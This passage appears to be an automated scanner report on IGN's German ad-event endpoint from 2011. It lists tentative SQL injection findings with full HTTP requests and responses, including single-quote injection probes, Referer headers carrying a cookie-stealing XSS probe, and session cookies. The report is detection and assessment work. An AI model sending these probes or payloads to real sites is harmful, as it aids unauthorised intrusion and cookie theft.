Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:13 GMT
Connection: close
Vary: Accept-Encoding


1.8. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61255,61583,61766,65373&RawValues=&random=dbmriqk,bguRrfrbdmWan [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61255,61583,61766,65373&RawValues=&random=dbmriqk,bguRrfrbdmWan

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61255,61583,61766,65373&RawValues=&random=dbmriqk,bguRrfrbdmWan HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61255,61583,61766,65373&RawValues=&random=dbmriqk,bguRrfrbdmWan HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding


1.9. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61255,61583,61766,65373&RawValues=&random=bRWKwsN,bguRragewbmIc [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61255,61583,61766,65373&RawValues=&random=bRWKwsN,bguRragewbmIc

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61255,61583,61766,65373&RawValues=&random=bRWKwsN,bguRragewbmIc HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61255,61583,61766,65373&RawValues=&random=bRWKwsN,bguRragewbmIc HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:31 GMT
Connection: close
Vary: Accept-Encoding


1.10. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61256,61583,61766,65373&RawValues=&random=bzpcKwp,bguRrfrbdmWap [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61256,61583,61766,65373&RawValues=&random=bzpcKwp,bguRrfrbdmWap

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61256,61583,61766,65373&RawValues=&random=bzpcKwp,bguRrfrbdmWap HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61256,61583,61766,65373&RawValues=&random=bzpcKwp,bguRrfrbdmWap HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding


1.11. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61256,61583,61766,65373&RawValues=&random=ARzkrx,bguRragewbmIe [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61256,61583,61766,65373&RawValues=&random=ARzkrx,bguRragewbmIe

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61256,61583,61766,65373&RawValues=&random=ARzkrx,bguRragewbmIe HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
